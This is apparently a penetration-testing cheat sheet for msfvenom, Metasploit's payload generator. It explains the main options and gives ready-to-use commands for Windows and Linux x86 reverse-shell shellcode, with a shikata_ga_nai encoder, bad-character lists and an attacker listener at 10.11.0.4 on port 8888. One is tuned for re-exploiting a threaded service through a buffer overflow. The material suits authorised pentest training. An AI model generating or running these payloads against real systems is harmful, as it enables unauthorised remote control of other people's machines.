msfvenom is an executable from Metasploit that helps generate payloads in numerous formats (ELF, PE, shellcode, PowerShell, etc) for binary exploitation, client-side attacks, and many more purposes.
Usage
msfvenom <options...>
-p <payload> <options>, i.e.-p windows/shell_reverse_tcp LHOST=...LHOST=<local ip>LPORT=8888EXITFUNC=thread(to exit gracefully with ExitThread method)
-f <format>: payload output format, i.e.corpystyled string orexe/elffor binary-v <varname>: specify a variable name used in shellcode string output-e <encoder>: encoder for the payload, i.e.-e x86/shikata_ga_nai-i <iters>: number of iterations to encode-b <badchars>: specify bad characters, i.e.-b "\x00\x0a\x0d\x25\x26\x2b\x3d"-x <embedfile>: file / executable to embed payload into
Examples
Windows
This snippet is intended for use with Windows buffer overflow on a threaded application over HTTP & TCP.
- Change LHOST IP address in the snippet
- Start listener / handler on 8888
Set EXITFUNC on threaded servers/applications!
ExitThread enables reexploitation of the same service instance. Otherwise, the service will crash after the first try of exploitation.
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=8888 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"Linux
This snippet generates a generic reverse shell shellcode in Python (e.g. for exploit development).
- Change LHOST IP
- Start listener on 8888.
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.4 LPORT=8888 -b "\x00\x20" -f py -v shellcode